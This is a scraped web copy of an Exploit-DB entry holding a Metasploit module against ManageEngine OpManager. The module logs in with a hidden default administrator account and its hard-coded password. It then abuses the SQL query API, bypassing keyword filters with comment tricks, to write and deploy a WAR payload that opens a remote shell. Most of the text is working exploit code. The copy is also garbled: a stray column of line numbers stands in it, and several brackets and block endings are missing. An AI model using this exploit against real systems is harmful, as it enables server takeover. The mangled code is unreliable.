ManageEngine OpManager – Remote Code Execution (Metasploit)

Exploit Database
113 阅读

作者： Metasploit

日期： 2015-09-17
类别：
- remote
平台：
- java
来源：https://www.exploit-db.com/exploits/38221/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

# It removes large object in database, shoudn't be a problem, but just in case....

Rank = ManualRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::FileDropper

def initialize(info={})

super(update_info(info,

'Name' => 'ManageEngine OpManager Remote Code Execution',

'Description'=> %q{

This module exploits a default credential vulnerability in ManageEngine OpManager, where a

default hidden account "IntegrationUser" with administrator privileges exists. The account

has a default password of "plugin" which can not be reset through the user interface. By

log-in and abusing the default administrator's SQL query functionality, it's possible to

write a WAR payload to disk and trigger an automatic deployment of this payload. This

module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

'License'=> MSF_LICENSE,

'Author' =>

[

'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module

'References' =>

[

[ 'EDB', '38174' ],

'Platform' => ['java'],

'Arch' => ARCH_JAVA,

'Targets'=>

[

['ManageEngine OpManager v11.6', {}]

'Privileged' => false,

'DisclosureDate' => 'Sep 14 2015',

'DefaultTarget'=> 0))

end

def uri

target_uri.path

end

def check

# Check version

vprint_status("#{peer} - Trying to detect ManageEngine OpManager")

res = send_request_cgi({

'method' => 'GET',

'uri'=> normalize_uri(uri, 'LoginPage.do')

})

unless res && res.code == 200

return Exploit::CheckCode::Safe

end

if res.body =~ /OpManager.*v\.([0-9]+\.[0-9]+)<\/span>/

version = $1

if Gem::Version.new(version) <= Gem::Version.new('11.6')

return Exploit::CheckCode::Appears

else

# Patch unknown

return Exploit::CheckCode::Detected

end

elsif res.body =~ /OpManager/

return Exploit::CheckCode::Detected

else

return Exploit::CheckCode::Safe

end

def sql_query( key, query )

res = send_request_cgi({

'method' => 'POST',

'uri'=> normalize_uri(uri, 'api', 'json', 'admin', 'SubmitQuery'),

'vars_get' => { 'apiKey' => key },

'vars_post' => { 'query' => query }

})

unless res && res.code == 200

fail_with(Failure::Unknown, "#{peer} - Query was not succesful!")

end

res

end

def exploit

print_status("#{peer} - Access login page")

res = send_request_cgi({

'method' => 'POST',

'uri'=> normalize_uri(uri, 'jsp', 'Login.do'),

'vars_post' => {

'domainName' => 'NULL',

'authType' => 'localUserLogin',

'userName' => 'IntegrationUser', # Hidden user

'password' => 'plugin' # Password of hidden user

}

})

if res && res.code == 302

redirect =URI(res.headers['Location']).to_s.gsub(/#\//, "")

print_status("#{peer} - Location is [ #{redirect} ]")

else

fail_with(Failure::Unknown, "#{peer} - Access to login page failed!")

end

# Follow redirection process

print_status("#{peer} - Following redirection")

res = send_request_cgi({

'uri' => redirect,

'method' => 'GET'

})

if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/

api_key = $1

print_status("#{peer} - Retrieved API key [ #{api_key} ]")

else

fail_with(Failure::Unknown, "#{peer} - Redirect failed!")

end

app_base = rand_text_alphanumeric(4 + rand(32 - 4))

war_payload = payload.encoded_war({ :app_name => app_base }).to_s

war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '')

print_status("#{peer} - Executing SQL queries")

# Remove large object in database, just in case it exists from previous exploit attempts

sql = 'SELECT lo_unlink(-1)'

sql_query(api_key, sql)

# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.

sql = 'SELECT lo_create(-1)'

result = sql_query(api_key, sql)

if result.body =~ /lo_create":([0-9]+)}/

lo_id = $1

else

fail_with(Failure::Unknown, "#{peer} - Postgres Large Object ID not found!")

end

# Insert WAR payload into the pg_largeobject table. We have to use /**/ to bypass OpManager'sa checks for INSERT/UPDATE/DELETE, etc.

sql = "INSERT/**/INTO pg_largeobject (loid,pageno,data) VALUES(#{lo_id}, 0, DECODE('#{war_payload_base64}', 'base64'))"

sql_query(api_key, sql)

# Export our large object id data into a WAR file

sql = "SELECT lo_export(#{lo_id}, '..//..//tomcat//webapps//#{app_base}.war');"

sql_query(api_key, sql)

# Remove our large object in the database

sql = 'SELECT lo_unlink(-1)'

sql_query(api_key, sql)

register_file_for_cleanup("tomcat//webapps//#{app_base}.war")

register_file_for_cleanup("tomcat//webapps//#{app_base}")

10.times do

select(nil, nil, nil, 2)

# Now make a request to trigger the newly deployed war

print_status("#{peer} - Attempting to launch payload in deployed WAR...")

res = send_request_cgi(

{

'uri'=> normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"),

'method' => 'GET'

})

# Failure. The request timed out or the server went away.

break if res.nil?

# Success! Triggered the payload, should have a shell incoming

break if res.code == 200

end